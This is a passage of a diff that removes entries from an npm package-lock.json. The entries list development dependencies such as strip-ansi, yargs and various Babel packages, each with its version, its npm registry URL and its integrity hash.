"sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/update-browserslist-db": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.10.tgz", - "integrity": "sha512-OztqDenkfFkbSG+tRxBeAnCVPckDBcvibKd35yDONx6OU8N7sqgwc7rCbkJ/WcYtVRZ4ba68d6byhC21GFh7sQ==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - } - ], - "dependencies": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - }, - "bin": { - "browserslist-lint": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.0.1", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.0.1.tgz", - "integrity": "sha512-74Y4LqY74kLE6IFyIjPtkSTWzUZmj8tdHT9Ii/26dvQ6K9Dl2NbEfj0XgU2sHCtKgt5VupqhlO/5aWuqS+IY1w==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/v8-to-istanbul/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^14.17.0 || ^16.13.0 || >=18.0.0" - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/yargs": { - "version": "17.6.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.6.2.tgz", - "integrity": "sha512-1/9UrdHjDZc0eOU0HxOHoS78C69UD3JRMvzlJ7S79S2nTaWRA/whGCTV8o9e/N/1Va9YIV7Q4sOxD8VV4pCWOw==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@ampproject/remapping": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.0.tgz", - "integrity": "sha512-qRmjj8nj9qmLTQXXmaR1cck3UXSRMPrbsLJAasZpF+t3riI71BXed5ebIOYwQntykeZuhjsdweEc9BxH5Jc26w==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.1.0", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "requires": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/compat-data": { - "version": "7.20.14", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.20.14.tgz", - "integrity": "sha512-0YpKHD6ImkWMEINCyDAD0HLLUH/lPCefG8ld9it8DJB2wnApraKuhgYTvTY1z7UFIfBTGy5LwncZ+5HWWGbhFw==", - "dev": true - }, - "@babel/core": { - "version": "7.20.12", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.20.12.tgz", - "integrity": "sha512-XsMfHovsUYHFMdrIHkZphTN/2Hzzi78R08NuHfDBehym2VsPDL6Zn/JAD/JQdnRvbSsbQc4mVaU1m6JgtTEElg==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.1.0", - "@babel/code-frame": "^7.18.6", - "@babel/generator": "^7.20.7", - "@babel/helper-compilation-targets": "^7.20.7", - "@babel/helper-module-transforms": "^7.20.11", - "@babel/helpers": "^7.20.7", - "@babel/parser": "^7.20.7", - "@babel/template": "^7.20.7", - "@babel/traverse": "^7.20.12", - "@babel/types": "^7.20.7", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2", - "semver": "^6.3.0" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "requires": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - }, - "dependencies": { - "@jridgewell/gen-mapping": { - "version": "0.3.2", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.2.tgz", - "integrity": "sha512-mh65xKQAzI6iBcFzwv28KVWSmCkdRBWoOh+bYQGW3+6OZvbbN3TqMGo5hqYxQniRcH9F2VZIoJCm4pa3BPDK/A==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - } - } - } - }, - "@babel/helper-compilation-targets": { - "version": "7.20.7", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.20.7.tgz", - "integrity": "sha512-4tGORmfQcrc+bvrjb5y3dG9Mx1IOZjsHqQVUz7XCNHO+iTmqxWnVg3KRygjGmpRLJGdQSKuvFinbIb0CnZwHAQ==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.20.5", - "@babel/helper-validator-option": "^7.18.6", - "browserslist": "^4.21.3", - "lru-cache": "^5.1.1", - "semver": "^6.3.0" - } - }, - "@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true - }, - "@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "requires": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - } - }, - "@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-imports": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.18.6.tgz", - "integrity": "sha512-0NFvs3VkuSYbFi1x2Vd6tKrywq+z/cLeYC/RJNFrIX/30Bf5aiGYbtvGXolEktzJH8o5E5KJ3tT+nkxuuZFVlA==", - "dev": true, - "requires": { - "@babel/types": "^7.18.6" - } - }, - "@babel/helper-module-transforms": { - "version": "7.20.11", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.20.11.tgz", - "integrity": "sha512-uRy78kN4psmji1s2QtbtcCSaj/LILFDp0f/ymhpQH5QY3nljUZCaNWz9X1dEj/8MBdBEFECs7yRhKn8i7NjZgg==", - "dev": true, - "requires": { - "@babel/helper-environment-visitor": "^7.18.9", - "@babel/helper-module-imports": "^7.18.6", - "@babel/helper-simple-access": "^7.20.2", - "@babel/helper-split-export-declaration": "^7.18.6", - "@babel/helper-validator-identifier": "^7.19.1", - "@babel/template": "^7.20.7", - "@babel/traverse": "^7.20.10", - "@babel/types": "^7.20.7" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.20.2", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.20.2.tgz", - "integrity": "sha512-8RvlJG2mj4huQ4pZ+rU9lqKi9ZKiRmuvGuM2HlWmkmgOhbs6zEAw6IEiJ5cQqGbDzGZOhwuOQNtZMi/ENLjZoQ==", - "dev": true - }, - "@babel/helper-simple-access": { - "version": "7.20.2", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.20.2.tgz", - "integrity": "sha512-+0woI/WPq59IrqDYbVGfshjT5Dmk/nnbdpcF8SnMhhXObpTq2KNBdLFRFrkVdbDOyUmHBCxzm5FHV1rACIkIbA==", - "dev": true, - "requires": { - "@babel/types": "^7.20.2" - } - }, - "@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.18.6.tgz", - "integrity": "sha512-XO7gESt5ouv/LRJdrVjkShckw6STTaB7l9BrpBaAHDeF5YZT+01PCwmR0SJHnkW6i8OwW/EVWRShfi4j2x+KQw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.20.13", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.20.13.tgz", - "integrity": "sha512-nzJ0DWCL3gB5RCXbUO3KIMMsBY2Eqbx8mBpKGE/02PgyRQFcPQLbkQ1vyy596mZLaP+dAfD+R4ckASzNVmW3jg==", - "dev": true, - "requires": { - "@babel/template": "^7.20.7", - "@babel/traverse": "^7.20.13", - "@babel/types": "^7.20.7" - } - }, - "@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.18.6.tgz", - "integrity": "sha512-6mmljtAedFGTWu2p/8WIORGwy+61PLgOMPOdazc7YoJ9ZCWUyFy3A6CpPkRKLKD1ToAesxX8KGEViAiLo9N+7Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.18.6" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - 